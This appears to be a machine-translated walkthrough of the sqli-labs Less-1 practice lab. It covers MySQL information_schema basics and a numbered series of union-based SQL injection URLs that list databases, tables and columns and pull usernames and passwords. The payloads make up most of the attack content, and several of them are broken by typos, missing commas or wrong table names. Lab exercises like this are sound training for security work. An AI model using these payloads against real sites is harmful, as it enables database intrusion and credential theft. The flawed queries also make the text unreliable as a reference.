Sqli-labs less-01

mysql Basic usage

 Check the library ：select schema_name from information_schema.schemata;
 Look up the table ：select table_name from information_schema.tables where table_schema='security';
 List ：select column_name from information_schema.columns where table_name='users';
 Check field ：select username,password from security.users;

less-01

Access to database ：mysql -h127.0.0.1 -uroot -proot

show databases;
use security;
select * from where id='1' LIMIT 0,1;

limit 0,1;  The first one is from the beginning , such as  0  Represents starting from the first , And the second 1 It represents how many data are displayed 

 stay  sql  In the sentence ：
--+： Subtraction plus 
-- ： Subtract spaces 
#： Well No 
 They all mean notes , Indicates that... Will not be executed after this symbol 

 stay  sql  In the sentence ：
or and
A and B ：A,B  All for  true  Only then  true
A or B ：A,B  One of the correct results is  true

order by number:
number ：  Which column does it represent , Arrange in order 

 The display does not have a fifth column 

 Try it out  mysql  In the database  less-1  There are three columns 

 At this time , Three columns are known  1,2,3
 So here we use  union 
 hold  id=1  Change it to  id=-1  Make it wrong , perform  union  hinder  sql  sentence 

 Now  name  by 2
password  by 3
 It indicates that there is echo , Can be handed over 

The basic usage of function

system_user()           # Current system users 
user()                  # Currently logged in user 
current_user()          # Currently logged in user 
database()              # Database currently in use 
version()               # At present  mysql  Version information 
@@datadir               # mysql  Installation path for 
@@version_compile_os    # The current operating system 

 In the above, because there is echo , So now I choose to  3  Do a database lookup operation at the location of 
 You will get the first database 

 Use  limit  Take out more data 
 Because in  web  Only one line can be displayed in the web page 
 So the line is constant , Just change the column 

 The output of the above one by one is very slow , So we use 
group_concat()
 It concatenates the data into a single line of output 

 At this time  mysql  The database comes out 
information_schema,challenges,mysql,performance_schema,security,sys

 At this time  security  To operate , obtain  security  Table information in 
emails,referers,uagents,users

 The last one in the previous step  table_schema='security'
 Single quotation marks are not recommended 

 Remove the single quotes , stay  security  Write before  0x  Turn into 16 Base number 
 Choose  security  And then click  Encoding  Click on  Hex Encode

 Yes  users  List to operate 
 alike  ‘’  The things inside are transformed into  16  Base number 

 Take out  user  Inside  username  and  password
 Use a batch function ： concat_ws('~~',A,B)     Express ：A~~B

http://127.0.0.1/sqli-labs-php7-master/Less-1/?id=-1'union select 1,2,group_concat(concat_ws('~~',username,password)) from security.users --+

 Equivalent to 

http://127.0.0.1/sqli-labs-php7-master/Less-1/?id=-1'union select 1,2,group_concat(concat_ws(0x7e7e,username,password)) from security.users --+

 Try to change the things in single quotation marks into  0x （16 Base number ）

Summary

1.  http://127.0.0.1/sqli-labs-php7-master/Less-1/?id=1'    # See if there is any injection 
2. http://127.0.0.1/sqli-labs-php7-master/Less-1/?id=-1' order by 3 --+ # See how many columns 
3. http://127.0.0.1/sqli-labs-php7-master/Less-1/?id=-1' union select 1,2,3 --+ # View the current data that can be echoed 
4. http://127.0.0.1/sqli-labs-php7-master/Less-1/?id=-1' union select 1,2,database() --+ # View the current database 
5. http://127.0.0.1/sqli-labs-php7-master/Less-1/?id=-1' union select 1,2,schema_name from information_schema.schemata limit 4,1 --+   # view the database  security 

 Or is it 

http://127.0.0.1/sqli-labs-php7-master/Less-1/?id=-1' union select 1,2,group_caoncat(schema_name) from information_schema.schemata --+    # View all databases 

6. http://127.0.0.1/sqli-labs-php7-master/Less-1/?id=-1’ union select 1,2,table_name from information_schema.tables where table_schema='security' limit 1,1 --+    # Look up the table 

 Or is it 

http://127.0.0.1/sqli-labs-php7-master/Less-1/?id=-1' union select 1,2group_concat(table_name) from information_schema.tables where table_schema='security' --+    # Look at all the tables 

7. http://127.0.0.1/sqli-labs-php7-master/Less-1/?id=-1' union select 1,2,column_name from information_schema.columns where table_name='security' --+    # Query column information 

 Or is it 

http://127.0.0.1/sqli-labs-php7-master/Less-1/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='security' --+   # View all column information 

8. http://127.0.0.1/sqli-labs-php7-master/Less-1/?id=-1' union select 1,2,concat_ws('~~',username,password) from security.users limit 1,1   # Check an account and password 

 Or is it 

http://127.0.0.1/sqli-labs-php7-master/Less-1/?id=-1' union select 1,2,group_concat(concat_ws('~~',username,password)) from security --+   # Check all available accounts and passwords , And use  ~~  The symbols are separated .

 Or is it 

http://127.0.0.1/sqli-labs-php7-master/Less-1/?id=-1' union select 1,2,group_concat(concat_ws('~~',username,password)) from security --+   # Check all available accounts and passwords , And use  ~~  The symbols are separated .